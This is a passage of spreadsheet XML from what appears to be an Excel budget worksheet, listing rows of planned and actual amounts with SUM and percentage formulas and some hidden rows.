        <v>1715</v>
      </c>
      <c r="E60" s="173">
        <f>SUM(E61:E70)</f>
        <v>1715</v>
      </c>
      <c r="F60" s="174">
        <f t="shared" si="5"/>
        <v>97.22222222222221</v>
      </c>
      <c r="G60" s="172"/>
    </row>
    <row r="61" spans="1:7" ht="17.25" customHeight="1">
      <c r="A61" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B61" s="100">
        <v>1184</v>
      </c>
      <c r="C61" s="100">
        <v>1184</v>
      </c>
      <c r="D61" s="100">
        <v>1135</v>
      </c>
      <c r="E61" s="173">
        <v>1135</v>
      </c>
      <c r="F61" s="174">
        <f t="shared" si="5"/>
        <v>95.86148648648648</v>
      </c>
      <c r="G61" s="172"/>
    </row>
    <row r="62" spans="1:7" ht="17.25" customHeight="1">
      <c r="A62" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B62" s="100">
        <v>480</v>
      </c>
      <c r="C62" s="100">
        <v>480</v>
      </c>
      <c r="D62" s="100">
        <v>480</v>
      </c>
      <c r="E62" s="173">
        <v>480</v>
      </c>
      <c r="F62" s="174">
        <f t="shared" si="5"/>
        <v>100</v>
      </c>
      <c r="G62" s="172"/>
    </row>
    <row r="63" spans="1:7" ht="17.25" customHeight="1">
      <c r="A63" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B63" s="100">
        <v>0</v>
      </c>
      <c r="C63" s="100"/>
      <c r="D63" s="100">
        <v>0</v>
      </c>
      <c r="E63" s="173"/>
      <c r="F63" s="174"/>
      <c r="G63" s="172"/>
    </row>
    <row r="64" spans="1:7" ht="17.25" customHeight="1">
      <c r="A64" s="128" t="s">
        <v>412</v>
      </c>
      <c r="B64" s="100">
        <v>0</v>
      </c>
      <c r="C64" s="100"/>
      <c r="D64" s="100">
        <v>0</v>
      </c>
      <c r="E64" s="173"/>
      <c r="F64" s="174"/>
      <c r="G64" s="172"/>
    </row>
    <row r="65" spans="1:7" ht="17.25" customHeight="1">
      <c r="A65" s="128" t="s">
        <v>413</v>
      </c>
      <c r="B65" s="100">
        <v>0</v>
      </c>
      <c r="C65" s="100"/>
      <c r="D65" s="100">
        <v>0</v>
      </c>
      <c r="E65" s="173"/>
      <c r="F65" s="174"/>
      <c r="G65" s="172"/>
    </row>
    <row r="66" spans="1:7" ht="17.25" customHeight="1">
      <c r="A66" s="128" t="s">
        <v>414</v>
      </c>
      <c r="B66" s="100">
        <v>0</v>
      </c>
      <c r="C66" s="100"/>
      <c r="D66" s="100">
        <v>100</v>
      </c>
      <c r="E66" s="173">
        <v>100</v>
      </c>
      <c r="F66" s="174"/>
      <c r="G66" s="172"/>
    </row>
    <row r="67" spans="1:7" ht="17.25" customHeight="1">
      <c r="A67" s="128" t="s">
        <v>415</v>
      </c>
      <c r="B67" s="100">
        <v>100</v>
      </c>
      <c r="C67" s="100">
        <v>100</v>
      </c>
      <c r="D67" s="100">
        <v>0</v>
      </c>
      <c r="E67" s="173"/>
      <c r="F67" s="174">
        <f>E67/C67*100</f>
        <v>0</v>
      </c>
      <c r="G67" s="172"/>
    </row>
    <row r="68" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A68" s="128" t="s">
        <v>416</v>
      </c>
      <c r="B68" s="100">
        <v>0</v>
      </c>
      <c r="C68" s="100"/>
      <c r="D68" s="100">
        <v>0</v>
      </c>
      <c r="E68" s="173"/>
      <c r="F68" s="174"/>
      <c r="G68" s="172"/>
    </row>
    <row r="69" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A69" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B69" s="100">
        <v>0</v>
      </c>
      <c r="C69" s="100"/>
      <c r="D69" s="100">
        <v>0</v>
      </c>
      <c r="E69" s="173"/>
      <c r="F69" s="174"/>
      <c r="G69" s="172"/>
    </row>
    <row r="70" spans="1:7" ht="17.25" customHeight="1">
      <c r="A70" s="128" t="s">
        <v>417</v>
      </c>
      <c r="B70" s="100">
        <v>0</v>
      </c>
      <c r="C70" s="100"/>
      <c r="D70" s="100">
        <v>0</v>
      </c>
      <c r="E70" s="173"/>
      <c r="F70" s="174"/>
      <c r="G70" s="172"/>
    </row>
    <row r="71" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A71" s="128" t="s">
        <v>418</v>
      </c>
      <c r="B71" s="100">
        <f>SUM(B72:B82)</f>
        <v>0</v>
      </c>
      <c r="C71" s="100">
        <f>SUM(C72:C82)</f>
        <v>0</v>
      </c>
      <c r="D71" s="100">
        <f>SUM(D72:D82)</f>
        <v>0</v>
      </c>
      <c r="E71" s="173">
        <f>SUM(E72:E82)</f>
        <v>0</v>
      </c>
      <c r="F71" s="174"/>
      <c r="G71" s="172"/>
    </row>
    <row r="72" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A72" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B72" s="100">
        <v>0</v>
      </c>
      <c r="C72" s="100"/>
      <c r="D72" s="100">
        <v>0</v>
      </c>
      <c r="E72" s="173"/>
      <c r="F72" s="174"/>
      <c r="G72" s="172"/>
    </row>
    <row r="73" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A73" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B73" s="100">
        <v>0</v>
      </c>
      <c r="C73" s="100"/>
      <c r="D73" s="100">
        <v>0</v>
      </c>
      <c r="E73" s="173"/>
      <c r="F73" s="174"/>
      <c r="G73" s="172"/>
    </row>
    <row r="74" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A74" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B74" s="100">
        <v>0</v>
      </c>
      <c r="C74" s="100"/>
      <c r="D74" s="100">
        <v>0</v>
      </c>
      <c r="E74" s="173"/>
      <c r="F74" s="174"/>
      <c r="G74" s="172"/>
    </row>
    <row r="75" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A75" s="128" t="s">
        <v>419</v>
      </c>
      <c r="B75" s="100">
        <v>0</v>
      </c>
      <c r="C75" s="100"/>
      <c r="D75" s="100">
        <v>0</v>
      </c>
      <c r="E75" s="173"/>
      <c r="F75" s="174"/>
      <c r="G75" s="172"/>
    </row>
    <row r="76" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A76" s="128" t="s">
        <v>420</v>
      </c>
      <c r="B76" s="100">
        <v>0</v>
      </c>
      <c r="C76" s="100"/>
      <c r="D76" s="100">
        <v>0</v>
      </c>
      <c r="E76" s="173"/>
      <c r="F76" s="174"/>
      <c r="G76" s="172"/>
    </row>
    <row r="77" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A77" s="128" t="s">
        <v>421</v>
      </c>
      <c r="B77" s="100">
        <v>0</v>
      </c>
      <c r="C77" s="100"/>
      <c r="D77" s="100">
        <v>0</v>
      </c>
      <c r="E77" s="173"/>
      <c r="F77" s="174"/>
      <c r="G77" s="172"/>
    </row>
    <row r="78" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A78" s="128" t="s">
        <v>422</v>
      </c>
      <c r="B78" s="100">
        <v>0</v>
      </c>
      <c r="C78" s="100"/>
      <c r="D78" s="100">
        <v>0</v>
      </c>
      <c r="E78" s="173"/>
      <c r="F78" s="174"/>
      <c r="G78" s="172"/>
    </row>
    <row r="79" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A79" s="128" t="s">
        <v>423</v>
      </c>
      <c r="B79" s="100">
        <v>0</v>
      </c>
      <c r="C79" s="100"/>
      <c r="D79" s="100">
        <v>0</v>
      </c>
      <c r="E79" s="173"/>
      <c r="F79" s="174"/>
      <c r="G79" s="172"/>
    </row>
    <row r="80" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A80" s="128" t="s">
        <v>415</v>
      </c>
      <c r="B80" s="100">
        <v>0</v>
      </c>
      <c r="C80" s="100"/>
      <c r="D80" s="100">
        <v>0</v>
      </c>
      <c r="E80" s="173"/>
      <c r="F80" s="174"/>
      <c r="G80" s="172"/>
    </row>
    <row r="81" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A81" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B81" s="100">
        <v>0</v>
      </c>
      <c r="C81" s="100"/>
      <c r="D81" s="100">
        <v>0</v>
      </c>
      <c r="E81" s="173"/>
      <c r="F81" s="174"/>
      <c r="G81" s="172"/>
    </row>
    <row r="82" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A82" s="128" t="s">
        <v>424</v>
      </c>
      <c r="B82" s="100">
        <v>0</v>
      </c>
      <c r="C82" s="100"/>
      <c r="D82" s="100">
        <v>0</v>
      </c>
      <c r="E82" s="173"/>
      <c r="F82" s="174"/>
      <c r="G82" s="172"/>
    </row>
    <row r="83" spans="1:7" ht="17.25" customHeight="1">
      <c r="A83" s="128" t="s">
        <v>425</v>
      </c>
      <c r="B83" s="100">
        <f>SUM(B84:B91)</f>
        <v>1625</v>
      </c>
      <c r="C83" s="100">
        <f>SUM(C84:C91)</f>
        <v>1617</v>
      </c>
      <c r="D83" s="100">
        <f>SUM(D84:D91)</f>
        <v>1717</v>
      </c>
      <c r="E83" s="173">
        <f>SUM(E84:E91)</f>
        <v>1717</v>
      </c>
      <c r="F83" s="174">
        <f aca="true" t="shared" si="6" ref="F83:F87">E83/C83*100</f>
        <v>106.18429189857761</v>
      </c>
      <c r="G83" s="172"/>
    </row>
    <row r="84" spans="1:7" ht="17.25" customHeight="1">
      <c r="A84" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B84" s="100">
        <v>617</v>
      </c>
      <c r="C84" s="100">
        <v>617</v>
      </c>
      <c r="D84" s="100">
        <v>717</v>
      </c>
      <c r="E84" s="173">
        <v>717</v>
      </c>
      <c r="F84" s="174">
        <f t="shared" si="6"/>
        <v>116.20745542949757</v>
      </c>
      <c r="G84" s="172"/>
    </row>
    <row r="85" spans="1:7" ht="17.25" customHeight="1">
      <c r="A85" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B85" s="100">
        <v>0</v>
      </c>
      <c r="C85" s="100"/>
      <c r="D85" s="100">
        <v>0</v>
      </c>
      <c r="E85" s="173"/>
      <c r="F85" s="174"/>
      <c r="G85" s="172"/>
    </row>
    <row r="86" spans="1:7" ht="17.25" customHeight="1">
      <c r="A86" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B86" s="100">
        <v>0</v>
      </c>
      <c r="C86" s="100"/>
      <c r="D86" s="100">
        <v>0</v>
      </c>
      <c r="E86" s="173"/>
      <c r="F86" s="174"/>
      <c r="G86" s="172"/>
    </row>
    <row r="87" spans="1:7" ht="17.25" customHeight="1">
      <c r="A87" s="128" t="s">
        <v>426</v>
      </c>
      <c r="B87" s="100">
        <v>1008</v>
      </c>
      <c r="C87" s="100">
        <v>1000</v>
      </c>
      <c r="D87" s="100">
        <v>1000</v>
      </c>
      <c r="E87" s="173">
        <v>1000</v>
      </c>
      <c r="F87" s="174">
        <f t="shared" si="6"/>
        <v>100</v>
      </c>
      <c r="G87" s="172"/>
    </row>
    <row r="88" spans="1:7" ht="17.25" customHeight="1">
      <c r="A88" s="128" t="s">
        <v>427</v>
      </c>
      <c r="B88" s="100">
        <v>0</v>
      </c>
      <c r="C88" s="100"/>
      <c r="D88" s="100">
        <v>0</v>
      </c>
      <c r="E88" s="173"/>
      <c r="F88" s="174"/>
      <c r="G88" s="172"/>
    </row>
    <row r="89" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A89" s="128" t="s">
        <v>415</v>
      </c>
      <c r="B89" s="100">
        <v>0</v>
      </c>
      <c r="C89" s="100"/>
      <c r="D89" s="100">
        <v>0</v>
      </c>
      <c r="E89" s="173"/>
      <c r="F89" s="174"/>
      <c r="G89" s="172"/>
    </row>
    <row r="90" spans="1:7" ht="17.25" customHeight="1">
      <c r="A90" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B90" s="100">
        <v>0</v>
      </c>
      <c r="C90" s="100"/>
      <c r="D90" s="100">
        <v>0</v>
      </c>
      <c r="E90" s="173"/>
      <c r="F90" s="174"/>
      <c r="G90" s="172"/>
    </row>
    <row r="91" spans="1:7" ht="17.25" customHeight="1">
      <c r="A91" s="128" t="s">
        <v>428</v>
      </c>
      <c r="B91" s="100">
        <v>0</v>
      </c>
      <c r="C91" s="100"/>
      <c r="D91" s="100">
        <v>0</v>
      </c>
      <c r="E91" s="173"/>
      <c r="F91" s="174"/>
      <c r="G91" s="172"/>
    </row>
    <row r="92" spans="1:7" ht="17.25" customHeight="1">
      <c r="A92" s="128" t="s">
        <v>429</v>
      </c>
      <c r="B92" s="100">
        <f>SUM(B93:B104)</f>
        <v>0</v>
      </c>
      <c r="C92" s="100">
        <f>SUM(C93:C104)</f>
        <v>0</v>
      </c>
      <c r="D92" s="100">
        <f>SUM(D93:D104)</f>
        <v>525</v>
      </c>
      <c r="E92" s="173">
        <f>SUM(E93:E104)</f>
        <v>525</v>
      </c>
      <c r="F92" s="174"/>
      <c r="G92" s="172"/>
    </row>
    <row r="93" spans="1:7" ht="17.25" customHeight="1">
      <c r="A93" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B93" s="100">
        <v>0</v>
      </c>
      <c r="C93" s="100"/>
      <c r="D93" s="100">
        <v>0</v>
      </c>
      <c r="E93" s="173"/>
      <c r="F93" s="174"/>
      <c r="G93" s="172"/>
    </row>
    <row r="94" spans="1:7" ht="17.25" customHeight="1">
      <c r="A94" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B94" s="100">
        <v>0</v>
      </c>
      <c r="C94" s="100"/>
      <c r="D94" s="100">
        <v>315</v>
      </c>
      <c r="E94" s="173">
        <v>315</v>
      </c>
      <c r="F94" s="174"/>
      <c r="G94" s="172"/>
    </row>
    <row r="95" spans="1:7" ht="17.25" customHeight="1">
      <c r="A95" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B95" s="100">
        <v>0</v>
      </c>
      <c r="C95" s="100"/>
      <c r="D95" s="100">
        <v>0</v>
      </c>
      <c r="E95" s="173"/>
      <c r="F95" s="174"/>
      <c r="G95" s="172"/>
    </row>
    <row r="96" spans="1:7" ht="17.25" customHeight="1">
      <c r="A96" s="128" t="s">
        <v>430</v>
      </c>
      <c r="B96" s="100">
        <v>0</v>
      </c>
      <c r="C96" s="100"/>
      <c r="D96" s="100">
        <v>0</v>
      </c>
      <c r="E96" s="173"/>
      <c r="F96" s="174"/>
      <c r="G96" s="172"/>
    </row>
    <row r="97" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A97" s="128" t="s">
        <v>431</v>
      </c>
      <c r="B97" s="100">
        <v>0</v>
      </c>
      <c r="C97" s="100"/>
      <c r="D97" s="100">
        <v>0</v>
      </c>
      <c r="E97" s="173"/>
      <c r="F97" s="174"/>
      <c r="G97" s="172"/>
    </row>
    <row r="98" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A98" s="128" t="s">
        <v>415</v>
      </c>
      <c r="B98" s="100">
        <v>0</v>
      </c>
      <c r="C98" s="100"/>
      <c r="D98" s="100">
        <v>0</v>
      </c>
      <c r="E98" s="173"/>
      <c r="F98" s="174"/>
      <c r="G98" s="172"/>
    </row>
    <row r="99" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A99" s="128" t="s">
        <v>432</v>
      </c>
      <c r="B99" s="100">
        <v>0</v>
      </c>
      <c r="C99" s="100"/>
      <c r="D99" s="100">
        <v>0</v>
      </c>
      <c r="E99" s="173"/>
      <c r="F99" s="174"/>
      <c r="G99" s="172"/>
    </row>
    <row r="100" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A100" s="128" t="s">
        <v>433</v>
      </c>
      <c r="B100" s="100">
        <v>0</v>
      </c>
      <c r="C100" s="100"/>
      <c r="D100" s="100">
        <v>0</v>
      </c>
      <c r="E100" s="173"/>
      <c r="F100" s="174"/>
      <c r="G100" s="172"/>
    </row>
    <row r="101" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A101" s="128" t="s">
        <v>434</v>
      </c>
      <c r="B101" s="100">
        <v>0</v>
      </c>
      <c r="C101" s="100"/>
      <c r="D101" s="100">
        <v>0</v>
      </c>
      <c r="E101" s="173"/>
      <c r="F101" s="174"/>
      <c r="G101" s="172"/>
    </row>
    <row r="102" spans="1:7" ht="17.25" customHeight="1">
      <c r="A102" s="128" t="s">
        <v>435</v>
      </c>
      <c r="B102" s="100">
        <v>0</v>
      </c>
      <c r="C102" s="100"/>
      <c r="D102" s="100">
        <v>180</v>
      </c>
      <c r="E102" s="173">
        <v>180</v>
      </c>
      <c r="F102" s="174"/>
      <c r="G102" s="172"/>
    </row>
    <row r="103" spans="1:7" ht="17.25" customHeight="1">
      <c r="A103" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B103" s="100">
        <v>0</v>
      </c>
      <c r="C103" s="100"/>
      <c r="D103" s="100">
        <v>30</v>
      </c>
      <c r="E103" s="173">
        <v>30</v>
      </c>
      <c r="F103" s="174"/>
      <c r="G103" s="172"/>
    </row>
    <row r="104" spans="1:7" ht="17.25" customHeight="1">
      <c r="A104" s="128" t="s">
        <v>436</v>
      </c>
      <c r="B104" s="100">
        <v>0</v>
      </c>
      <c r="C104" s="100"/>
      <c r="D104" s="100">
        <v>0</v>
      </c>
      <c r="E104" s="173"/>
      <c r="F104" s="174"/>
      <c r="G104" s="172"/>
    </row>
    <row r="105" spans="1:7" ht="17.25" customHeight="1">
      <c r="A105" s="128" t="s">
        <v>437</v>
      </c>
      <c r="B105" s="100">
        <f>SUM(B106:B114)</f>
        <v>1942</v>
      </c>
      <c r="C105" s="100">
        <f>SUM(C106:C114)</f>
        <v>1942</v>
      </c>
      <c r="D105" s="100">
        <f>SUM(D106:D114)</f>
        <v>1825</v>
      </c>
      <c r="E105" s="173">
        <f>SUM(E106:E114)</f>
        <v>1825</v>
      </c>
      <c r="F105" s="174">
        <f aca="true" t="shared" si="7" ref="F105:F107">E105/C105*100</f>
        <v>93.97528321318228</v>
      </c>
      <c r="G105" s="172"/>
    </row>
    <row r="106" spans="1:7" ht="17.25" customHeight="1">
      <c r="A106" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B106" s="100">
        <v>222</v>
      </c>
      <c r="C106" s="100">
        <v>222</v>
      </c>
      <c r="D106" s="100">
        <v>251</v>
      </c>
      <c r="E106" s="173">
        <v>251</v>
      </c>
      <c r="F106" s="174">
        <f t="shared" si="7"/>
        <v>113.06306306306307</v>
      </c>
      <c r="G106" s="172"/>
    </row>
    <row r="107" spans="1:7" ht="17.25" customHeight="1">
      <c r="A107" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B107" s="100">
        <v>80</v>
      </c>
      <c r="C107" s="100">
        <v>80</v>
      </c>
      <c r="D107" s="100">
        <v>74</v>
      </c>
      <c r="E107" s="173">
        <v>74</v>
      </c>
      <c r="F107" s="174">
        <f t="shared" si="7"/>
        <v>92.5</v>
      </c>
      <c r="G107" s="172"/>
    </row>
    <row r="108" spans="1:7" ht="17.25" customHeight="1">
      <c r="A108" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B108" s="100">
        <v>0</v>
      </c>
      <c r="C108" s="100"/>
      <c r="D108" s="100">
        <v>0</v>
      </c>
      <c r="E108" s="173"/>
      <c r="F108" s="174"/>
      <c r="G108" s="172"/>
    </row>
    <row r="109" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A109" s="128" t="s">
        <v>438</v>
      </c>
      <c r="B109" s="100">
        <v>0</v>
      </c>
      <c r="C109" s="100"/>
      <c r="D109" s="100">
        <v>0</v>
      </c>
      <c r="E109" s="173"/>
      <c r="F109" s="174"/>
      <c r="G109" s="172"/>
    </row>
    <row r="110" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A110" s="128" t="s">
        <v>439</v>
      </c>
      <c r="B110" s="100">
        <v>0</v>
      </c>
      <c r="C110" s="100"/>
      <c r="D110" s="100">
        <v>0</v>
      </c>
      <c r="E110" s="173"/>
      <c r="F110" s="174"/>
      <c r="G110" s="172"/>
    </row>
    <row r="111" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A111" s="128" t="s">
        <v>440</v>
      </c>
      <c r="B111" s="100">
        <v>0</v>
      </c>
      <c r="C111" s="100"/>
      <c r="D111" s="100">
        <v>0</v>
      </c>
      <c r="E111" s="173"/>
      <c r="F111" s="174"/>
      <c r="G111" s="172"/>
    </row>
    <row r="112" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A112" s="128" t="s">
        <v>441</v>
      </c>
      <c r="B112" s="100">
        <v>0</v>
      </c>
      <c r="C112" s="100"/>
      <c r="D112" s="100">
        <v>0</v>
      </c>
      <c r="E112" s="173"/>
      <c r="F112" s="174"/>
      <c r="G112" s="172"/>
    </row>
    <row r="113" spans="1:7" ht="17.25" customHeight="1">
      <c r="A113" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B113" s="100">
        <v>140</v>
      </c>
      <c r="C113" s="100">
        <v>140</v>
      </c>
      <c r="D113" s="100">
        <v>0</v>
      </c>
      <c r="E113" s="173"/>
      <c r="F113" s="174">
        <f aca="true" t="shared" si="8" ref="F113:F117">E113/C113*100</f>
        <v>0</v>
      </c>
      <c r="G113" s="172"/>
    </row>
    <row r="114" spans="1:7" ht="17.25" customHeight="1">
      <c r="A114" s="128" t="s">
        <v>442</v>
      </c>
      <c r="B114" s="100">
        <v>1500</v>
      </c>
      <c r="C114" s="100">
        <v>1500</v>
      </c>
      <c r="D114" s="100">
        <v>1500</v>
      </c>
      <c r="E114" s="173">
        <v>1500</v>
      </c>
      <c r="F114" s="174">
        <f t="shared" si="8"/>
        <v>100</v>
      </c>
      <c r="G114" s="172"/>
    </row>
    <row r="115" spans="1:7" ht="17.25" customHeight="1">
      <c r="A115" s="128" t="s">
        <v>443</v>
      </c>
      <c r="B115" s="100">
        <f>SUM(B116:B123)</f>
        <v>5623</v>
      </c>
      <c r="C115" s="100">
        <f>SUM(C116:C123)</f>
        <v>2623</v>
      </c>
      <c r="D115" s="100">
        <f>SUM(D116:D123)</f>
        <v>9964</v>
      </c>
      <c r="E115" s="173">
        <f>SUM(E116:E123)</f>
        <v>2964</v>
      </c>
      <c r="F115" s="174">
        <f t="shared" si="8"/>
        <v>113.0003812428517</v>
      </c>
      <c r="G115" s="172"/>
    </row>
    <row r="116" spans="1:7" ht="17.25" customHeight="1">
      <c r="A116" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B116" s="100">
        <v>1343</v>
      </c>
      <c r="C116" s="100">
        <v>1343</v>
      </c>
      <c r="D116" s="100">
        <v>1351</v>
      </c>
      <c r="E116" s="173">
        <v>1351</v>
      </c>
      <c r="F116" s="174">
        <f t="shared" si="8"/>
        <v>100.59568131049888</v>
      </c>
      <c r="G116" s="172"/>
    </row>
    <row r="117" spans="1:7" ht="17.25" customHeight="1">
      <c r="A117" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B117" s="100">
        <v>880</v>
      </c>
      <c r="C117" s="100">
        <v>880</v>
      </c>
      <c r="D117" s="100">
        <v>1200</v>
      </c>
      <c r="E117" s="173">
        <v>1200</v>
      </c>
      <c r="F117" s="174">
        <f t="shared" si="8"/>
        <v>136.36363636363635</v>
      </c>
      <c r="G117" s="172"/>
    </row>
    <row r="118" spans="1:7" ht="17.25" customHeight="1">
      <c r="A118" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B118" s="100">
        <v>0</v>
      </c>
      <c r="C118" s="100"/>
      <c r="D118" s="100">
        <v>0</v>
      </c>
      <c r="E118" s="173"/>
      <c r="F118" s="174"/>
      <c r="G118" s="172"/>
    </row>
    <row r="119" spans="1:7" ht="17.25" customHeight="1">
      <c r="A119" s="128" t="s">
        <v>444</v>
      </c>
      <c r="B119" s="100">
        <v>0</v>
      </c>
      <c r="C119" s="100"/>
      <c r="D119" s="100">
        <v>0</v>
      </c>
      <c r="E119" s="173"/>
      <c r="F119" s="174"/>
      <c r="G119" s="172"/>
    </row>
    <row r="120" spans="1:7" ht="17.25" customHeight="1">
      <c r="A120" s="128" t="s">
        <v>445</v>
      </c>
      <c r="B120" s="100">
        <v>0</v>
      </c>
      <c r="C120" s="100"/>
      <c r="D120" s="100">
        <v>413</v>
      </c>
      <c r="E120" s="173">
        <v>413</v>
      </c>
      <c r="F120" s="174"/>
      <c r="G120" s="172"/>
    </row>
    <row r="121" spans="1:7" ht="17.25" customHeight="1">
      <c r="A121" s="128" t="s">
        <v>446</v>
      </c>
      <c r="B121" s="100">
        <v>0</v>
      </c>
      <c r="C121" s="100"/>
      <c r="D121" s="100">
        <v>0</v>
      </c>
      <c r="E121" s="173"/>
      <c r="F121" s="174"/>
      <c r="G121" s="172"/>
    </row>
    <row r="122" spans="1:7" ht="17.25" customHeight="1">
      <c r="A122" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B122" s="100">
        <v>0</v>
      </c>
      <c r="C122" s="100"/>
      <c r="D122" s="100">
        <v>0</v>
      </c>
      <c r="E122" s="173"/>
      <c r="F122" s="174"/>
      <c r="G122" s="172"/>
    </row>
    <row r="123" spans="1:7" ht="17.25" customHeight="1">
      <c r="A123" s="128" t="s">
        <v>447</v>
      </c>
      <c r="B123" s="100">
        <v>3400</v>
      </c>
      <c r="C123" s="100">
        <v>400</v>
      </c>
      <c r="D123" s="100">
        <v>7000</v>
      </c>
      <c r="E123" s="173"/>
      <c r="F123" s="174">
        <f aca="true" t="shared" si="9" ref="F123:F126">E123/C123*100</f>
        <v>0</v>
      </c>
      <c r="G123" s="172"/>
    </row>
    <row r="124" spans="1:7" ht="17.25" customHeight="1">
      <c r="A124" s="128" t="s">
        <v>448</v>
      </c>
      <c r="B124" s="100">
        <f>SUM(B125:B134)</f>
        <v>1051</v>
      </c>
      <c r="C124" s="100">
        <f>SUM(C125:C134)</f>
        <v>1007</v>
      </c>
      <c r="D124" s="100">
        <f>SUM(D125:D134)</f>
        <v>1269</v>
      </c>
      <c r="E124" s="173">
        <f>SUM(E125:E134)</f>
        <v>1269</v>
      </c>
      <c r="F124" s="174">
        <f t="shared" si="9"/>
        <v>126.01787487586891</v>
      </c>
      <c r="G124" s="172"/>
    </row>
    <row r="125" spans="1:7" ht="17.25" customHeight="1">
      <c r="A125" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B125" s="100">
        <v>442</v>
      </c>
      <c r="C125" s="100">
        <v>442</v>
      </c>
      <c r="D125" s="100">
        <v>456</v>
      </c>
      <c r="E125" s="173">
        <v>456</v>
      </c>
      <c r="F125" s="174">
        <f t="shared" si="9"/>
        <v>103.16742081447966</v>
      </c>
      <c r="G125" s="172"/>
    </row>
    <row r="126" spans="1:7" ht="17.25" customHeight="1">
      <c r="A126" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B126" s="100">
        <v>109</v>
      </c>
      <c r="C126" s="100">
        <v>65</v>
      </c>
      <c r="D126" s="100">
        <v>65</v>
      </c>
      <c r="E126" s="173">
        <v>65</v>
      </c>
      <c r="F126" s="174">
        <f t="shared" si="9"/>
        <v>100</v>
      </c>
      <c r="G126" s="172"/>
    </row>
    <row r="127" spans="1:7" ht="17.25" customHeight="1">
      <c r="A127" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B127" s="100">
        <v>0</v>
      </c>
      <c r="C127" s="100"/>
      <c r="D127" s="100">
        <v>0</v>
      </c>
      <c r="E127" s="173"/>
      <c r="F127" s="174"/>
      <c r="G127" s="172"/>
    </row>
    <row r="128" spans="1:7" ht="17.25" customHeight="1">
      <c r="A128" s="128" t="s">
        <v>449</v>
      </c>
      <c r="B128" s="100">
        <v>0</v>
      </c>
      <c r="C128" s="100"/>
      <c r="D128" s="100">
        <v>180</v>
      </c>
      <c r="E128" s="173">
        <v>180</v>
      </c>
      <c r="F128" s="174"/>
      <c r="G128" s="172"/>
    </row>
    <row r="129" spans="1:7" ht="17.25" customHeight="1">
      <c r="A129" s="128" t="s">
        <v>450</v>
      </c>
      <c r="B129" s="100">
        <v>0</v>
      </c>
      <c r="C129" s="100"/>
      <c r="D129" s="100">
        <v>0</v>
      </c>
      <c r="E129" s="173"/>
      <c r="F129" s="174"/>
      <c r="G129" s="172"/>
    </row>
    <row r="130" spans="1:7" ht="17.25" customHeight="1">
      <c r="A130" s="128" t="s">
        <v>451</v>
      </c>
      <c r="B130" s="100">
        <v>0</v>
      </c>
      <c r="C130" s="100"/>
      <c r="D130" s="100">
        <v>0</v>
      </c>
      <c r="E130" s="173"/>
      <c r="F130" s="174"/>
      <c r="G130" s="172"/>
    </row>
    <row r="131" spans="1:7" ht="17.25" customHeight="1">
      <c r="A131" s="128" t="s">
        <v>452</v>
      </c>
      <c r="B131" s="100">
        <v>0</v>
      </c>
      <c r="C131" s="100"/>
      <c r="D131" s="100">
        <v>0</v>
      </c>
      <c r="E131" s="173"/>
      <c r="F131" s="174"/>
      <c r="G131" s="172"/>
    </row>
    <row r="132" spans="1:7" ht="17.25" customHeight="1">
      <c r="A132" s="128" t="s">
        <v>453</v>
      </c>
      <c r="B132" s="100">
        <v>500</v>
      </c>
      <c r="C132" s="100">
        <v>500</v>
      </c>
      <c r="D132" s="100">
        <v>500</v>
      </c>
      <c r="E132" s="173">
        <v>500</v>
      </c>
      <c r="F132" s="174">
        <f>E132/C132*100</f>
        <v>100</v>
      </c>
      <c r="G132" s="172"/>
    </row>
    <row r="133" spans="1:7" ht="17.25" customHeight="1">
      <c r="A133" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B133" s="100">
        <v>0</v>
      </c>
      <c r="C133" s="100"/>
      <c r="D133" s="100">
        <v>58</v>
      </c>
      <c r="E133" s="173">
        <v>58</v>
      </c>
